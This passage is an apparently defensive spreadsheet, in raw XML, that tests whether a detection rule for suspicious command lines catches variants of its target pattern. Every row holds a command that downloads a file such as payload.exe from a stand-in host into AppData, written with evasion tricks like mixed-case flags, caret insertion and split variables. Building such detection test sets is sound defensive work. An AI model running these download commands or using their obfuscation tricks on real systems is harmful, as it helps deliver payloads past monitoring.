          <t>t1059.001</t>
        </is>
      </c>
      <c r="B156" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C156" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D156" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E156" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I156" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J156" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K156" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B157" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C157" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D157" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E157" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I157" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J157" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K157" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B158" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C158" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D158" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E158" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMAnD "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I158" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J158" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K158" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B159" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C159" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D159" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E159" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I159" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J159" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K159" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="160" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B160" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C160" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D160" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E160" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H160" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I160" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J160" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K160" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B161" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C161" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D161" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E161" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H161" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I161" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J161" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K161" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B162" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C162" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D162" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E162" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H162" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I162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162" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K162" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B163" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C163" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D163" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E163" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I163" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J163" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K163" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B164" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C164" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D164" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E164" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H164" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I164" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J164" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K164" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B165" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C165" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D165" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E165" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H165" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I165" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J165" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K165" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B166" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C166" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D166" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E166" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H166" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I166" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J166" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K166" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B167" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C167" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D167" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E167" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H167" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I167" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J167" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K167" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B168" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C168" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D168" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E168" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H168" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I168" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J168" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K168" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B169" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C169" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D169" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E169" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F169" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G169" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H169" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I169" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J169" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K169" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B170" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C170" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D170" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E170" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H170" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I170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70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K170" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1" s="42">
      <c r="A171" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B171" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C171" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D171" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E171" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H171" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I171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171" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K171" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="172" ht="15.75" customHeight="1" s="42">
      <c r="A172" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B172" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C172" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D172" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E172" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I172" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J172" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K172" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="173" ht="15.75" customHeight="1" s="42">
      <c r="A173" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B173" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C173" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D173" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E173" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H173" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I173" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J173" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K173" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="174" ht="15.75" customHeight="1" s="42">
      <c r="A174" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B174" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C174" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D174" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E174" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H174" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I174" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J174" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K174" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1" s="42">
      <c r="A175" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B175" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C175" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D175" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E175" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H175" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I175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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K175" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="176" ht="15.75" customHeight="1" s="42">
      <c r="A176" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B176" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C176" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D176" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E176" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H176" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I176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176" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K176" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1" s="42">
      <c r="A177" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B177" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C177" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D177" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E177" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H177" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I177" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J177" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K177" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="178" ht="15.75" customHeight="1" s="42">
      <c r="A178" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B178" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C178" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D178" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E178" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"V:ON" -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H178" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I178" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J178" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K178" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="179" ht="15.75" customHeight="1" s="42">
      <c r="A179" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B179" s="44" t="inlineStr">
        <is>
